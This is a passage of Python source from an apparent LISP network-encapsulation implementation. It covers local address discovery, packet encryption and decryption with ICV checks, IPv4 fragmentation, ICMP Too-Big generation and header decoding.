#enddef
#
# lisp_is_mac_string
#
# Return True if the supplied string parameter is in the form "xxxx-xxxx-xxxx".
# The input prefix could be "xxxx-xxxx-xxxx/48".
#
def lisp_is_mac_string(mac_str):
mac = mac_str.split("/")
if (len(mac) == 2): mac_str = mac[0]
return(len(mac_str) == 14 and mac_str.count("-") == 2)
#enddef
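#
# Examples (illustrative): lisp_is_mac_string("0050-5600-0001") and
# lisp_is_mac_string("0050-5600-0001/48") both return True;
# lisp_is_mac_string("00:50:56:00:00:01") returns False.
#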
#
# lisp_get_local_macs
#
# Walk all interfaces, and for each ethernet interface, put the MAC address
# as a key into lisp_mymacs with a value of array of interface names.
#
def lisp_get_local_macs():
for device in netifaces.interfaces():
#
# Ignore bogus interface names that containers may create. Allow
# interface names with colons, dashes, and alphanumeric characters.
#
d = device.replace(":", "")
d = d.replace("-", "") # chain off d so both colons and dashes are removed
if (d.isalnum() == False): continue
#
# Need this for EOS because a "pimreg" interface will crash the call
# to netifaces.ifaddresses("pimreg").
#
try:
parms = netifaces.ifaddresses(device)
except:
continue
#endtry
if (netifaces.AF_LINK not in parms): continue
mac = parms[netifaces.AF_LINK][0]["addr"]
mac = mac.replace(":", "")
#
# GRE tunnels have strange MAC addresses (less than 48-bits). Ignore
# them.
#
if (len(mac) < 12): continue
if (mac not in lisp_mymacs): lisp_mymacs[mac] = []
lisp_mymacs[mac].append(device)
#endfor
lprint("Local MACs are: {}".format(lisp_mymacs))
return
#enddef
#
# lisp_get_local_rloc
#
# Use "ip addr show" on Linux and "ifconfig" on MacOS to get a local IPv4
# address. Get interface name from "netstat -rn" to grep for.
#
def lisp_get_local_rloc():
out = getoutput("netstat -rn | egrep 'default|0.0.0.0'")
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#
# Get last item on first line of output.
#
out = out.split("\n")[0]
device = out.split()[-1]
addr = ""
macos = lisp_is_macos()
if (macos):
out = getoutput("ifconfig {} | egrep 'inet '".format(device))
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
else:
cmd = 'ip addr show | egrep "inet " | egrep "{}"'.format(device)
out = getoutput(cmd)
if (out == ""):
cmd = 'ip addr show | egrep "inet " | egrep "global lo"'
out = getoutput(cmd)
#endif
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#endif
#
# Check for multi-line. And favor returning private address so NAT
# traversal is used in lig.
#
addr = ""
out = out.split("\n")
for line in out:
a = line.split()[1]
if (macos == False): a = a.split("/")[0]
address = lisp_address(LISP_AFI_IPV4, a, 32, 0)
if (address.is_private_address()): return(address) # favor private addresses, per the comment above
addr = a
#endfor
return(lisp_address(LISP_AFI_IPV4, addr, 32, 0))
#enddef
#
# lisp_get_local_addresses
#
# Use netifaces module to get a IPv4 and IPv6 local RLOC of this system.
# Return an array of 2 elements where [0] is an IPv4 RLOC and [1] is an
# IPv6 RLOC.
#
# Stores data in lisp.lisp_myrlocs[].
#
def lisp_get_local_addresses():
global lisp_myrlocs
#
# Check to see if we should not get the first address. Use environment
# variable (1-based addressing) to determine which one to get. If the
# number of addresses are less than the index, use the last one.
#
# The format of the environment variable could be <number> or
# <device>:<number>. The format could also be "<device>:" but make sure
# the user typed in a ":".
#
device_select = None
index = 1
parm = os.getenv("LISP_ADDR_SELECT")
if (parm != None and parm != ""):
parm = parm.split(":")
if (len(parm) == 2):
device_select = parm[0]
index = parm[1]
else:
if (parm[0].isdigit()):
index = parm[0]
else:
device_select = parm[0]
#endif
#endif
index = 1 if (index == "") else int(index)
#endif
rlocs = [None, None, None]
rloc4 = lisp_address(LISP_AFI_IPV4, "", 32, 0)
rloc6 = lisp_address(LISP_AFI_IPV6, "", 128, 0)
device_iid = None
for device in netifaces.interfaces():
if (device_select != None and device_select != device): continue
addresses = netifaces.ifaddresses(device)
if (addresses == {}): continue
#
# Set instance-ID for interface.
#
device_iid = lisp_get_interface_instance_id(device, None)
#
# Look for a non-link-local and non-loopback address.
#
if (netifaces.AF_INET in addresses):
ipv4 = addresses[netifaces.AF_INET]
count = 0
for addr in ipv4:
rloc4.store_address(addr["addr"])
if (rloc4.is_ipv4_loopback()): continue
if (rloc4.is_ipv4_link_local()): continue
if (rloc4.address == 0): continue
count += 1
rloc4.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc4, False)): continue
rlocs[0] = rloc4
if (count == index): break
#endfor
#endif
if (netifaces.AF_INET6 in addresses):
ipv6 = addresses[netifaces.AF_INET6]
count = 0
for addr in ipv6:
addr_str = addr["addr"]
rloc6.store_address(addr_str)
if (rloc6.is_ipv6_string_link_local(addr_str)): continue
if (rloc6.is_ipv6_loopback()): continue
count += 1
rloc6.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc6, False)): continue
rlocs[1] = rloc6
if (count == index): break
#endfor
#endif
#
# Did we find an address? If not, loop and get the next interface.
#
if (rlocs[0] == None): continue
rlocs[2] = device
break
#endfor
addr1 = rlocs[0].print_address_no_iid() if rlocs[0] else "none"
addr2 = rlocs[1].print_address_no_iid() if rlocs[1] else "none"
device = rlocs[2] if rlocs[2] else "none"
device_select = " (user selected)" if device_select != None else ""
addr1 = red(addr1, False)
addr2 = red(addr2, False)
device = bold(device, False)
lprint("Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}". \
format(addr1, addr2, device, device_select, device_iid))
lisp_myrlocs = rlocs
return((rlocs[0] != None))
#enddef
#
# lisp_get_all_addresses
#
# Return a list of all local IPv4 and IPv6 addresses from kernel. This is
# going to be used for building pcap and iptables filters. So no loopback or
# link-local addresses are returned.
#
def lisp_get_all_addresses():
address_list = []
for interface in netifaces.interfaces():
try: entry = netifaces.ifaddresses(interface)
except: continue
if (netifaces.AF_INET in entry):
for addr in entry[netifaces.AF_INET]:
a = addr["addr"]
if (a.find("127.0.0.1") != -1): continue
address_list.append(a)
#endfor
#endif
if (netifaces.AF_INET6 in entry):
for addr in entry[netifaces.AF_INET6]:
a = addr["addr"]
if (a == "::1"): continue
if (a[0:5] == "fe80:"): continue
address_list.append(a)
#endfor
#endif
#endfor
return(address_list)
#enddef
#
# lisp_get_all_multicast_rles
#
# Grep lisp.config and get all multicast RLEs that appear in the configuration.
# Returns either an empty array or filled with one or more multicast addresses.
#
def lisp_get_all_multicast_rles():
rles = []
out = getoutput('egrep "rle-address =" ./lisp.config')
if (out == ""): return(rles)
lines = out.split("\n")
for line in lines:
if (line[0] == "#"): continue
rle = line.split("rle-address = ")[1]
rle_byte = int(rle.split(".")[0])
if (rle_byte >= 224 and rle_byte < 240): rles.append(rle)
#endfor
return(rles)
#enddef
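#
# Illustrative example of the first-byte check above: an RLE of
# 239.1.1.1 has first byte 239, inside [224, 240) -- the IPv4 multicast
# block 224.0.0.0/4 -- so it is kept; 10.1.1.1 (first byte 10) is not.
#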
#------------------------------------------------------------------------------
#
# LISP packet contents. This keeps state for a LISP encapsulated packet that
# is processed by an RTR and ETR.
#
class lisp_packet(object):
def __init__(self, packet):
self.outer_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_tos = 0
self.outer_ttl = 0
self.udp_sport = 0
self.udp_dport = 0
self.udp_length = 0
self.udp_checksum = 0
self.inner_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_sport = 0
self.inner_dport = 0
self.lisp_header = lisp_data_header()
self.packet = packet
self.inner_version = 0
self.outer_version = 0
self.encap_port = LISP_DATA_PORT
self.inner_is_fragment = False
self.packet_error = ""
self.gleaned_dest = False
#enddef
def encode(self, nonce):
#
# We could be running with no RLOCs found. If lisp_myrlocs[] is None,
# then self.outer_source will be LISP_AFI_NONE.
#
if (self.outer_source.is_null()): return(None)
#
# We have to build the LISP header here because if we are doing
# lisp-crypto, the ICV covers the LISP header. The function
# lisp_packet.encrypt() will put in the key-id.
#
if (nonce == None):
self.lisp_header.nonce(lisp_get_data_nonce())
elif (self.lisp_header.is_request_nonce(nonce)):
self.lisp_header.request_nonce(nonce)
else:
self.lisp_header.nonce(nonce)
#endif
self.lisp_header.instance_id(self.inner_dest.instance_id)
#
# Encrypt the packet. If something goes wrong, send the packet
# unencrypted by signaling key-id 0 to the RLOC. For now, just use
# key-id 1 since we support only a single key.
#
self.lisp_header.key_id(0)
control = (self.lisp_header.get_instance_id() == 0xffffff)
if (lisp_data_plane_security and control == False):
addr_str = self.outer_dest.print_address_no_iid() + ":" + \
str(self.encap_port)
if (addr_str in lisp_crypto_keys_by_rloc_encap):
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]):
keys[1].use_count += 1
packet, encrypted = self.encrypt(keys[1], addr_str)
if (encrypted): self.packet = packet
#endif
#endif
#endif
#
# Start with the UDP header. Call hash_packet() to set the source-port
# value, unless we are doing lisp-crypto and nat-traversal.
#
self.udp_checksum = 0
if (self.encap_port == LISP_DATA_PORT):
if (lisp_crypto_ephem_port == None):
if (self.gleaned_dest):
self.udp_sport = LISP_DATA_PORT
else:
self.hash_packet()
#endif
else:
self.udp_sport = lisp_crypto_ephem_port
#endif
else:
self.udp_sport = LISP_DATA_PORT
#endif
self.udp_dport = self.encap_port
self.udp_length = len(self.packet) + 16
#
# Swap UDP port numbers and length field since they are 16-bit values.
#
sport = socket.htons(self.udp_sport)
dport = socket.htons(self.udp_dport)
udp_len = socket.htons(self.udp_length)
udp = struct.pack("HHHH", sport, dport, udp_len, self.udp_checksum)
#
# Encode the LISP header.
#
lisp = self.lisp_header.encode()
#
# Now prepend all 3 headers, LISP, UDP, outer header. See lisp_packet.
# fix_outer_header() for byte-swap details for the frag-offset field.
#
if (self.outer_version == 4):
tl = socket.htons(self.udp_length + 20)
frag = socket.htons(0x4000)
outer = struct.pack("BBHHHBBH", 0x45, self.outer_tos, tl, 0xdfdf,
frag, self.outer_ttl, 17, 0)
outer += self.outer_source.pack_address()
outer += self.outer_dest.pack_address()
outer = lisp_ip_checksum(outer)
elif (self.outer_version == 6):
outer = b""
# short = 6 << 12
# short |= self.outer_tos << 4
# short = socket.htons(short)
# tl = socket.htons(self.udp_length)
# outer = struct.pack("HHHBB", short, 0, tl, 17, self.outer_ttl)
# outer += self.outer_source.pack_address()
# outer += self.outer_dest.pack_address()
else:
return(None)
#endif
self.packet = outer + udp + lisp + self.packet
return(self)
#enddef
def cipher_pad(self, packet):
length = len(packet)
if ((length % 16) != 0):
pad = (old_div(length, 16) + 1) * 16
packet = packet.ljust(pad)
#endif
return(packet)
#enddef
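#
# Worked example (illustrative): cipher_pad() space-pads with ljust()
# so AES-CBC sees a multiple of 16 bytes:
#
#   >>> packet = b"x" * 50
#   >>> len(packet.ljust((50 // 16 + 1) * 16))
#   64
#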
def encrypt(self, key, addr_str):
if (key == None or key.shared_key == None):
return([self.packet, False])
#endif
#
# Pad packet to multiple of 16 bytes and call AES cipher.
#
packet = self.cipher_pad(self.packet)
iv = key.get_iv()
ts = lisp_get_timestamp()
aead = None
encode_ciphertext = False
if (key.cipher_suite == LISP_CS_25519_CHACHA):
encrypt = chacha.ChaCha(key.encrypt_key, iv).encrypt
encode_ciphertext = True
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
aesgcm = AES.new(k, AES.MODE_GCM, iv)
encrypt = aesgcm.encrypt
aead = aesgcm.digest
except:
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([self.packet, False])
#endtry
else:
k = binascii.unhexlify(key.encrypt_key)
encrypt = AES.new(k, AES.MODE_CBC, iv).encrypt
#endif
ciphertext = encrypt(packet)
if (ciphertext == None): return([self.packet, False])
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# Chacha produced ciphertext in unicode for py2. Convert to raw-
# unicode-escape before proceeding, or else you cannot append it to
# strings generated from different sources. Do this in do_icv() too.
#
if (encode_ciphertext):
ciphertext = ciphertext.encode("raw_unicode_escape")
#endif
#
# GCM requires 16 bytes of an AEAD MAC tag at the end of the
# ciphertext. Needed to interoperate with the Go implementation of
# AES-GCM. The MAC digest was computed above.
#
if (aead != None): ciphertext += aead()
#
# Compute ICV and append to packet. ICV covers the LISP header, the
# IV, and the ciphertext.
#
self.lisp_header.key_id(key.key_id)
lisp = self.lisp_header.encode()
icv = key.do_icv(lisp + iv + ciphertext, iv)
ps = 4 if (key.do_poly) else 8
string = bold("Encrypt", False)
cipher_str = bold(key.cipher_suite_string, False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): 0x{}...{}".format(auth, icv[0:ps], icv[-ps::])
dprint("{} for key-id: {}, {}, {}, {}-time: {} usec".format( \
string, key.key_id, addr_str, icv_str, cipher_str, ts))
icv = int(icv, 16)
if (key.do_poly):
icv1 = byte_swap_64((icv >> 64) & LISP_8_64_MASK)
icv2 = byte_swap_64(icv & LISP_8_64_MASK)
icv = struct.pack("QQ", icv1, icv2)
else:
icv1 = byte_swap_64((icv >> 96) & LISP_8_64_MASK)
icv2 = byte_swap_64((icv >> 32) & LISP_8_64_MASK)
icv3 = socket.htonl(icv & 0xffffffff)
icv = struct.pack("QQI", icv1, icv2, icv3)
#endif
return([iv + ciphertext + icv, True])
#enddef
def decrypt(self, packet, header_length, key, addr_str):
#
# Do ICV first. If it succeeds, then decrypt. Get ICV from packet and
# truncate packet to run hash over. Compare packet hash with computed
# hash.
#
if (key.do_poly):
icv1, icv2 = struct.unpack("QQ", packet[-16::])
packet_icv = byte_swap_64(icv1) << 64
packet_icv |= byte_swap_64(icv2)
packet_icv = lisp_hex_string(packet_icv).zfill(32)
packet = packet[0:-16]
ps = 4
hash_str = bold("poly", False)
else:
icv1, icv2, icv3 = struct.unpack("QQI", packet[-20::])
packet_icv = byte_swap_64(icv1) << 96
packet_icv |= byte_swap_64(icv2) << 32
packet_icv |= socket.htonl(icv3)
packet_icv = lisp_hex_string(packet_icv).zfill(40)
packet = packet[0:-20]
ps = 8
hash_str = bold("sha", False)
#endif
lisp = self.lisp_header.encode()
#
# Get the IV and use it to decrypt and authenticate.
#
if (key.cipher_suite == LISP_CS_25519_CHACHA):
iv_len = 8
cipher_str = bold("chacha", False)
elif (key.cipher_suite == LISP_CS_25519_GCM):
iv_len = 12
cipher_str = bold("aes-gcm", False)
else:
iv_len = 16
cipher_str = bold("aes-cbc", False)
#endif
iv = packet[0:iv_len]
#
# Compute ICV over LISP header and packet payload.
#
computed_icv = key.do_icv(lisp + packet, iv)
p_icv = "0x{}...{}".format(packet_icv[0:ps], packet_icv[-ps::])
c_icv = "0x{}...{}".format(computed_icv[0:ps], computed_icv[-ps::])
if (computed_icv != packet_icv):
self.packet_error = "ICV-error"
funcs = cipher_str + "/" + hash_str
fail = bold("ICV failed ({})".format(funcs), False)
icv_str = "packet-ICV {} != computed-ICV {}".format(p_icv, c_icv)
dprint(("{} from RLOC {}, receive-port: {}, key-id: {}, " + \
"packet dropped, {}").format(fail, red(addr_str, False),
self.udp_sport, key.key_id, icv_str))
dprint("{}".format(key.print_keys()))
#
# This is the 4-tuple NAT case. There is another addr:port that
# should have the crypto-key the encapsulator is using. This is
# typically done on the RTR.
#
lisp_retry_decap_keys(addr_str, lisp + packet, iv, packet_icv)
return([None, False])
#endif
#
# Advance over IV for decryption.
#
packet = packet[iv_len::]
#
# Call AES or chacha cipher. Make sure for AES-CBC that the
# ciphertext length is a multiple of 16 bytes.
#
ts = lisp_get_timestamp()
if (key.cipher_suite == LISP_CS_25519_CHACHA):
decrypt = chacha.ChaCha(key.encrypt_key, iv).decrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
decrypt = AES.new(k, AES.MODE_GCM, iv).decrypt
except:
self.packet_error = "no-decrypt-key"
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([None, False])
#endtry
else:
if ((len(packet) % 16) != 0):
dprint("Ciphertext not multiple of 16 bytes, packet dropped")
return([None, False])
#endif
k = binascii.unhexlify(key.encrypt_key)
decrypt = AES.new(k, AES.MODE_CBC, iv).decrypt
#endif
plaintext = decrypt(packet)
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# Now decrypt packet and return plaintext payload.
#
string = bold("Decrypt", False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): {}".format(auth, p_icv)
dprint("{} for key-id: {}, {}, {} (good), {}-time: {} usec". \
format(string, key.key_id, addr_str, icv_str, cipher_str, ts))
#
# Keep self.packet the outer header, UDP header, and LISP header.
# We will append the plaintext in the caller once we parse the inner
# packet length so we can truncate any padding the encryptor put on.
#
self.packet = self.packet[0:header_length]
return([plaintext, True])
#enddef
def fragment_outer(self, outer_hdr, inner_packet):
frag_len = 1000
#
# Break up packet payload in fragments and put in array to have
# IP header added in next loop below.
#
frags = []
offset = 0
length = len(inner_packet)
while (offset < length):
frag = inner_packet[offset::]
if (len(frag) > frag_len): frag = frag[0:frag_len]
frags.append(frag)
offset += len(frag)
#endwhile
#
# Now fix outer IPv4 header with fragment-offset values and add the
# IPv4 value.
#
fragments = []
offset = 0
for frag in frags:
#
# Set frag-offset field in outer IPv4 header.
#
fo = offset if (frag == frags[-1]) else 0x2000 + offset
fo = socket.htons(fo)
outer_hdr = outer_hdr[0:6] + struct.pack("H", fo) + outer_hdr[8::]
#
# Set total-length field in outer IPv4 header and checksum.
#
l = socket.htons(len(frag) + 20)
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragments.append(outer_hdr + frag)
offset += old_div(len(frag), 8)
#endfor
return(fragments)
#enddef
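#
# Worked example (illustrative): a 2500-byte inner payload with the
# 1000-byte frag_len above yields three fragments. The frag-offset
# field counts 8-byte units and 0x2000 is the more-fragments bit:
#
#   fragment 1: bytes 0-999,     field = 0x2000 | 0   = 0x2000
#   fragment 2: bytes 1000-1999, field = 0x2000 | 125 = 0x207d
#   fragment 3: bytes 2000-2499, field = 250          = 0x00fa
#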
def send_icmp_too_big(self, inner_packet):
global lisp_last_icmp_too_big_sent
global lisp_icmp_raw_socket
elapsed = time.time() - lisp_last_icmp_too_big_sent
if (elapsed < LISP_ICMP_TOO_BIG_RATE_LIMIT):
lprint("Rate limit sending ICMP Too-Big to {}".format( \
self.inner_source.print_address_no_iid()))
return(False)
#endif
#
# Destination Unreachable Message - Too Big Message
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 3 | Code = 4 | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | unused | MTU = 1400 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Internet Header + 64 bits of Original Data Datagram |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
mtu = socket.htons(1400)
icmp = struct.pack("BBHHH", 3, 4, 0, 0, mtu)
icmp += inner_packet[0:20+8]
icmp = lisp_icmp_checksum(icmp)
#
# Build IP header. Make the source of the ICMP-invoking packet the
# destination and our address the source. We already have our address
# from when we attempted to encap, so lisp_packet.outer_source holds
# the RLOC address of this system.
#
host = inner_packet[12:16]
dest = self.inner_source.print_address_no_iid()
me = self.outer_source.pack_address()
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
# host byte order. We need to build the total-length field just like
# lisp_packet.encode(), checksum, and then fix outer header. So that
# logic is semantically replicated here. Same logic is in lisp_packet.
# fragment() as well.
#
tl = socket.htons(20+36)
ip = struct.pack("BBHHHBBH", 0x45, 0, tl, 0, 0, 32, 1, 0) + me + host
ip = lisp_ip_checksum(ip)
ip = self.fix_outer_header(ip)
ip += icmp
tb = bold("Too-Big", False)
lprint("Send ICMP {} to {}, mtu 1400: {}".format(tb, dest,
lisp_format_packet(ip)))
try:
lisp_icmp_raw_socket.sendto(ip, (dest, 0))
except socket.error as e:
lprint("lisp_icmp_raw_socket.sendto() failed: {}".format(e))
return(False)
#endtry
#
# Caller function sends packet on raw socket. Kernel routes out
# interface to destination.
#
lisp_last_icmp_too_big_sent = lisp_get_timestamp()
return(True)
#enddef
def fragment(self):
global lisp_icmp_raw_socket
global lisp_ignore_df_bit
packet = self.fix_outer_header(self.packet)
#
# If inner header is IPv4, we will fragment the inner header and encap
# each fragment. If the inner header is IPv6, we will not add the
# Fragmentation Header into the inner IPv6 packet.
#
length = len(packet)
if (length <= 1500): return([packet], "Fragment-None")
packet = self.packet
#
# Fragment outer IPv4 header if inner packet is IPv6 (or Mac frame).
# We cannot fragment IPv6 packet since we are not the source.
#
if (self.inner_version != 4):
ident = random.randint(0, 0xffff)
outer_hdr = packet[0:4] + struct.pack("H", ident) + packet[6:20]
inner_packet = packet[20::]
fragments = self.fragment_outer(outer_hdr, inner_packet)
return(fragments, "Fragment-Outer")
#endif
#
# Fragment inner IPv4 packet.
#
outer_hdr_len = 56 if (self.outer_version == 6) else 36
outer_hdr = packet[0:outer_hdr_len]
inner_hdr = packet[outer_hdr_len: outer_hdr_len + 20]
inner_packet = packet[outer_hdr_len + 20::]
#
# If DF-bit is set, don't fragment packet. Do MTU discovery if
# configured with env variable.
#
frag_field = struct.unpack("H", inner_hdr[6:8])[0]
frag_field = socket.ntohs(frag_field)
if (frag_field & 0x4000):
if (lisp_icmp_raw_socket != None):
inner = packet[outer_hdr_len::]
if (self.send_icmp_too_big(inner)): return([], None)
#endif
if (lisp_ignore_df_bit):
frag_field &= ~0x4000
else:
df_bit = bold("DF-bit set", False)
dprint("{} in inner header, packet discarded".format(df_bit))
return([], "Fragment-None-DF-bit")
#endif
#endif
offset = 0
length = len(inner_packet)
fragments = []
while (offset < length):
fragments.append(inner_packet[offset:offset+1400])
offset += 1400
#endwhile
#
# Now put inner header and outer header on each fragment.
#
frags = fragments
fragments = []
mf = True if frag_field & 0x2000 else False
frag_field = (frag_field & 0x1fff) * 8
for frag in frags:
#
# Set fragment-offset and MF bit if not last fragment.
#
ff = old_div(frag_field, 8)
if (mf):
ff |= 0x2000
elif (frag != frags[-1]):
ff |= 0x2000
#endif
ff = socket.htons(ff)
inner_hdr = inner_hdr[0:6] + struct.pack("H", ff) + inner_hdr[8::]
#
# Set length of fragment, set up offset for next fragment-offset,
# and header checksum fragment packet. Then prepend inner header
# to payload.
#
length = len(frag)
frag_field += length
l = socket.htons(length + 20)
inner_hdr = inner_hdr[0:2] + struct.pack("H", l) + \
inner_hdr[4:10] + struct.pack("H", 0) + inner_hdr[12::]
inner_hdr = lisp_ip_checksum(inner_hdr)
fragment = inner_hdr + frag
#
# Change outer header length and header checksum if IPv4 outer
# header. If IPv6 outer header, raw sockets prepends the header.
#
length = len(fragment)
if (self.outer_version == 4):
l = length + outer_hdr_len
length += 16
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + \
outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragment = outer_hdr + fragment
fragment = self.fix_outer_header(fragment)
#endif
#
# Finally fix outer UDP header length. Byte-swap it.
#
udp_len_index = outer_hdr_len - 12
l = socket.htons(length)
fragment = fragment[0:udp_len_index] + struct.pack("H", l) + \
fragment[udp_len_index+2::]
fragments.append(fragment)
#endfor
return(fragments, "Fragment-Inner")
#enddef
def fix_outer_header(self, packet):
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
# in host byte order. So have to byte-swapped here. But when testing
# we (UPC guys) discovered the frag field didn't need swapping. The
# conclusion is that byte-swapping is necessary for MacOS but not for
# Linux OSes.
#
if (self.outer_version == 4 or self.inner_version == 4):
if (lisp_is_macos()):
packet = packet[0:2] + packet[3:4] + packet[2:3] + \
packet[4:6] + packet[7:8] + packet[6:7] + packet[8::]
else:
packet = packet[0:2] + packet[3:4] + packet[2:3] + packet[4::]
#endif
#endif
return(packet)
#enddef
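#
# Illustrative sketch of the macOS byte-swap above: for a total-length
# of 0x0054 sitting in network byte order at bytes 2-3, swapping gives
# b"\x54\x00", i.e. host byte order on a little-endian machine, which
# is what IP_HDRINCL expects there:
#
#   hdr = b"\x45\x00\x00\x54" + b"\x00" * 16
#   swapped = hdr[0:2] + hdr[3:4] + hdr[2:3] + hdr[4::]
#   assert swapped[2:4] == b"\x54\x00"
#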
def send_packet(self, lisp_raw_socket, dest):
if (lisp_flow_logging and dest != self.inner_dest): self.log_flow(True)
dest = dest.print_address_no_iid()
fragments, in_or_out = self.fragment()
for fragment in fragments:
if (len(fragments) != 1):
self.packet = fragment
self.print_packet(in_or_out, True)
#endif
try: lisp_raw_socket.sendto(fragment, (dest, 0))
except socket.error as e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#endfor
#enddef
def send_l2_packet(self, l2_socket, mac_header):
if (l2_socket == None):
lprint("No layer-2 socket, drop IPv6 packet")
return
#endif
if (mac_header == None):
lprint("Could not build MAC header, drop IPv6 packet")
return
#endif
packet = mac_header + self.packet
# try: l2_socket.send(packet)
# except socket.error as e:
# lprint("send_l2_packet(): socket.send() failed: {}".format(e))
# #endtry
# return
#
# Use tuntap tunnel interface instead of raw sockets for IPv6
# decapsulated packets.
#
l2_socket.write(packet)
return
#enddef
def bridge_l2_packet(self, eid, db):
try: dyn_eid = db.dynamic_eids[eid.print_address_no_iid()]
except: return
try: interface = lisp_myinterfaces[dyn_eid.interface]
except: return
try:
socket = interface.get_bridge_socket()
if (socket == None): return
except: return
try: socket.send(self.packet)
except socket.error as e:
lprint("bridge_l2_packet(): socket.send() failed: {}".format(e))
#endtry
#enddef
def is_lisp_packet(self, packet):
udp = (struct.unpack("B", packet[9:10])[0] == LISP_UDP_PROTOCOL)
if (udp == False): return(False)
port = struct.unpack("H", packet[22:24])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
port = struct.unpack("H", packet[20:22])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
return(False)
#enddef
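#
# Offset sketch for the checks above (IPv4, no options, illustrative):
# byte 9 is the IP protocol field, bytes 20-21 the UDP source port,
# and bytes 22-23 the UDP destination port. A packet is treated as
# LISP when either UDP port is 4341 (LISP_DATA_PORT).
#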
def decode(self, is_lisp_packet, lisp_ipc_socket, stats):
self.packet_error = ""
packet = self.packet
orig_len = len(packet)
L3 = L2 = True
#
# Get version number of outer header so we can decode outer addresses.
#
header_len = 0
iid = self.lisp_header.get_instance_id()
if (is_lisp_packet):
version = struct.unpack("B", packet[0:1])[0]
self.outer_version = version >> 4
if (self.outer_version == 4):
#
# MacOS is zeroing the IP header checksum for a raw socket.
# If we receive this, bypass the checksum calculation.
#
orig_checksum = struct.unpack("H", packet[10:12])[0]
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
if (orig_checksum != 0 or lisp_is_macos() == False):
self.packet_error = "checksum-error"
if (stats):
stats[self.packet_error].increment(orig_len)
#endif
lprint("IPv4 header checksum failed for outer header")
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
afi = LISP_AFI_IPV4
offset = 12
self.outer_tos = struct.unpack("B", packet[1:2])[0]
self.outer_ttl = struct.unpack("B", packet[8:9])[0]
header_len = 20
elif (self.outer_version == 6):
afi = LISP_AFI_IPV6
offset = 8
tos = struct.unpack("H", packet[0:2])[0]
self.outer_tos = (socket.ntohs(tos) >> 4) & 0xff
self.outer_ttl = struct.unpack("B", packet[7:8])[0]
header_len = 40
else:
self.packet_error = "outer-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode outer header")
return(None)
#endif
self.outer_source.afi = afi
self.outer_dest.afi = afi
addr_length = self.outer_source.addr_length()
self.outer_source.unpack_address(packet[offset:offset+addr_length])
offset += addr_length
self.outer_dest.unpack_address(packet[offset:offset+addr_length])
packet = packet[header_len::]
self.outer_source.mask_len = self.outer_source.host_mask_len()
self.outer_dest.mask_len = self.outer_dest.host_mask_len()
#
# Get UDP fields
#
short = struct.unpack("H", packet[0:2])[0]
self.udp_sport = socket.ntohs(short)
short = struct.unpack("H", packet[2:4])[0]
self.udp_dport = socket.ntohs(short)
short = struct.unpack("H", packet[4:6])[0]
self.udp_length = socket.ntohs(short)
short = struct.unpack("H", packet[6:8])[0]
self.udp_checksum = socket.ntohs(short)
packet = packet[8::]
#
# Determine what is inside, a packet or a frame.
#
L3 = (self.udp_dport == LISP_DATA_PORT or
self.udp_sport == LISP_DATA_PORT)
L2 = (self.udp_dport in (LISP_L2_DATA_PORT, LISP_VXLAN_DATA_PORT))
#
# Get LISP header fields.
#
if (self.lisp_header.decode(packet) == False):
self.packet_error = "lisp-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
lprint("Cannot decode LISP header")
return(None)
#endif
packet = packet[8::]
iid = self.lisp_header.get_instance_id()
header_len += 16
#endif
if (iid == 0xffffff): iid = 0
#
# Time to decrypt if K-bits set.
#
decrypted = False
key_id = self.lisp_header.k_bits
if (key_id):
addr_str = lisp_get_crypto_decap_lookup_key(self.outer_source,
self.udp_sport)
if (addr_str == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
